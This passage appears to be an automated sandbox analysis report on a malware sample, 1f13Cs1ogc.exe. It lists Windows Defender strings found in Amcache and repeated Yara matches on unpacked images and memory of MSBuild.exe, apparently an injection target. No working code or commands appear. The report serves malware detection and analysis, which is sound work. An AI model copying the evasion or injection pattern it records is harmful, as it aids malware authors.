Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE7815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, |
0_2_00FE7815 |
Source: Amcache.hve.7.dr |
Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe |
Source: Amcache.hve.7.dr |
Binary or memory string: msmpeng.exe |
Source: Amcache.hve.7.dr |
Binary or memory string: c:\program files\windows defender\msmpeng.exe |
Source: Amcache.hve.7.dr |
Binary or memory string: MsMpEng.exe |
Source: Yara match |
File source: 0.2.1f13Cs1ogc.exe.100dad8.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.1f13Cs1ogc.exe.100dad8.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.1f13Cs1ogc.exe.fe0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR |
Source: Yara match |
File source: dump.pcap, type: PCAP |
Source: Yara match |
File source: 0.2.1f13Cs1ogc.exe.100dad8.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.1f13Cs1ogc.exe.100dad8.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.1f13Cs1ogc.exe.fe0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR |
Source: Yara match |
File source: dump.pcap, type: PCAP |